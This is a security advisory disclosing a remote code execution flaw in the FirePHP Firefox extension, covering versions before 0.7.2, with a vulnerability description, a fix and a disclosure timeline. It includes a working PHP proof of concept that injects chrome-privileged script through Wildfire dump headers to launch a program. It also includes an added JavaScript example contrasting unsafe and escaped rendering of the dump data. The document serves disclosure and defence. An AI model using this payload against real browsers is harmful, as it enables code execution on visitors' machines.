--------------------------------------------------------------------------------------------
20130417 - Justanotherhacker.com : FirePHP firefox plugin remote code execution
JAHx132 - http://www.justanotherhacker.com/advisories/JAHx132.txt
--------------------------------------------------------------------------------------------

FirePHP enables you to log to your Firebug Console using a simple PHP method call. All data
is sent via response headers and will not interfere with the content on your page. FirePHP
is ideally suited for AJAX development where clean JSON and XML responses are required.
[ Taken from: http://www.firephp.org/ ]

--- Vulnerability description ---
The extension does not sufficiently validate cell names (array keys) in dump data received
from the remote host. The dump is rendered inside the Firebug console, which runs in the
chrome-privileged context, so a key containing script markup executes with the privileges
of the browser itself as soon as a user inspects the malicious data in FirePHP. The data
arrives in ordinary HTTP response headers, so any server the user visits with FirePHP
enabled can supply it.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Remote Code Execution
Severity: High
Release: Responsible
Vendor: FirePHP - http://www.firephp.org/
Affected versions: All versions prior to 0.7.2

--- Proof of Concept ---
Serve the following PHP script and open it in Firefox with the FirePHP extension enabled and
the Firebug console open. The Wildfire headers carry a Dump structure whose inner array has
a key beginning with <SCRIPT>; when FirePHP renders the dump, the script runs in the chrome
context and launches calc.exe through XPCOM (nsILocalFile / nsIProcess).

<?php
// FirePHP Firefox plugin RCE PoC
// Wildfire Dump payload of the form {"label":{"cell name":"value"}}; the cell name
// carries the script. The opening line of the string is truncated in this copy of the
// advisory, so the label "dump" below is a placeholder for whatever the original used.
$exploit = '{"dump":{"<SCRIPT>';
$exploit.= 'var lFile=Components.classes[\"@mozilla.org/file/local;1\"].createInstance(Components.interfaces.nsILocalFile);';
$exploit.= 'lFile.initWithPath(\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\calc.exe\");';
$exploit.= 'var process=Components.classes[\"@mozilla.org/process/util;1\"].createInstance(Components.interfaces.nsIProcess);';
$exploit.= 'process.init(lFile);';
$exploit.= 'process.run(true,[],0);void(0);';
$exploit.= '<\/SCRIPT>":"PWNT"}}';

// Send FirePHP dump data (Wildfire protocol headers)
header("X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2");
header("X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3");
header("X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1");
// Message value format is LENGTH|JSON| where LENGTH is the byte length of the JSON.
// header() appends the line terminator itself, so no trailing "\r\n" is needed.
$payload = "X-Wf-1-1-1-1: ";
$payload.= strlen($exploit).'|'.$exploit.'|';
header($payload);
?>
FirePHP Firefox plugin RCE PoC PWNT!

--- Solution ---
Upgrade to version 0.7.2 or later.

--- Disclosure time line ---
17-Apr-2013 - Public disclosure
17-Apr-2013 - New version available via mozilla addons
12-Apr-2013 - New version released
12-Apr-2013 - Vendor acknowledged vulnerability
09-Apr-2013 - Vendor notified by email
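The cell-name injection described above, as an added example that is not FirePHP's own code: a parser for a Wildfire message header value of the form LENGTH|JSON| (the framing the PoC emits in X-Wf-1-1-1-1), followed by two renderings of the dumped object as an HTML table. The unsafe rendering splices array keys straight into markup, which is the class of flaw the advisory describes; the hardened rendering HTML-escapes every label, key and value first. The sample header value, the "dump" label and the inert alert() payload are constructed for this example, and rendering is modelled as HTML strings so the code runs under Node without a DOM.

```javascript
// Added example, not FirePHP's code. Models Wildfire message parsing and dump-table
// rendering so the key-name injection and its fix can be compared side by side.

// Parse one Wildfire message header value: "LENGTH|JSON|", where LENGTH is the byte
// length of the JSON. Rejects malformed framing and length mismatches.
function parseWildfireMessage(headerValue) {
  const sep = headerValue.indexOf('|');
  if (sep < 0 || !headerValue.endsWith('|') || headerValue.length < sep + 2) {
    throw new Error('malformed Wildfire message');
  }
  const declared = Number(headerValue.slice(0, sep));
  const json = headerValue.slice(sep + 1, -1);
  if (!Number.isInteger(declared) || Buffer.byteLength(json, 'utf8') !== declared) {
    throw new Error('Wildfire length mismatch');
  }
  return JSON.parse(json);
}

// Minimal HTML escaping for text that will be placed inside element content.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable pattern: the dump label and every array key (cell name) and value are
// concatenated into markup. A key such as <SCRIPT>...</SCRIPT> becomes live script in
// whatever document this HTML is assigned to; in FirePHP that document was chrome-privileged.
function renderDumpUnsafe(dump) {
  let html = '';
  for (const [label, table] of Object.entries(dump)) {
    html += `<h3>${label}</h3><table>`;
    for (const [cell, value] of Object.entries(table)) {
      html += `<tr><td>${cell}</td><td>${value}</td></tr>`;
    }
    html += '</table>';
  }
  return html;
}

// Hardened pattern: every server-supplied string is escaped before it touches markup,
// so the cell name is displayed as text rather than parsed as a tag.
function renderDumpSafe(dump) {
  let html = '';
  for (const [label, table] of Object.entries(dump)) {
    html += `<h3>${escapeHtml(label)}</h3><table>`;
    for (const [cell, value] of Object.entries(table)) {
      html += `<tr><td>${escapeHtml(cell)}</td><td>${escapeHtml(value)}</td></tr>`;
    }
    html += '</table>';
  }
  return html;
}

// Constructed sample: same shape as the PoC's X-Wf-1-1-1-1 value, with an inert
// alert() in place of the XPCOM payload. "dump" is an assumed label.
const SAMPLE_JSON = '{"dump":{"<SCRIPT>alert(1)<\\/SCRIPT>":"PWNT"}}';
const SAMPLE_HEADER = `${Buffer.byteLength(SAMPLE_JSON, 'utf8')}|${SAMPLE_JSON}|`;

// Parse the sample and render it both ways.
function demo() {
  const dump = parseWildfireMessage(SAMPLE_HEADER);
  return { unsafe: renderDumpUnsafe(dump), safe: renderDumpSafe(dump) };
}

console.log(JSON.stringify(demo(), null, 2));
```

In a real extension the hardened path would build the table with createElement and textContent instead of assembling an HTML string at all; escaping is shown here because it makes the difference between the two outputs visible in a plain Node run. The length check matters too: a client that trusts the declared LENGTH without verifying it can be made to parse a different byte range than the server framed.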